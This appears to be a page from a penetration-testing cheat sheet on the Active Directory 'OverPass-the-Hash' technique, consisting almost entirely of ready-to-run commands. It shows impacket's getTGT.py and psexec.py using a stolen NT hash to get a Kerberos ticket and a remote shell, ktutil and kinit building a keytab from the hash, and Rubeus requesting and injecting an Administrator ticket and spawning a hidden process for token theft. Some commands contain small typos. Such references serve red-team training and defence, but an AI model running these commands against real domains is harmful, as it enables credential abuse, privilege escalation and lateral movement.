hash-over-pass-the-hash.md (1508B)
1 --- 2 title: "Hash - OverPass-the-Hash" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/hash-over-pass-the-hash.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/hash-over-pass-the-hash.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Hash - OverPass-the-Hash 12 13 > In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). 14 15 ## Using impacket 16 17 ```bash 18 root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com 19 root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" 20 root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass 21 22 root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 23 root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM 24 root@kali:~$ klist 25 ``` 26 27 ## Using Rubeus 28 29 ```powershell 30 # Request a TGT as the target user and pass it into the current session 31 # NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs 32 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt 33 34 # Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) 35 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe 36 ```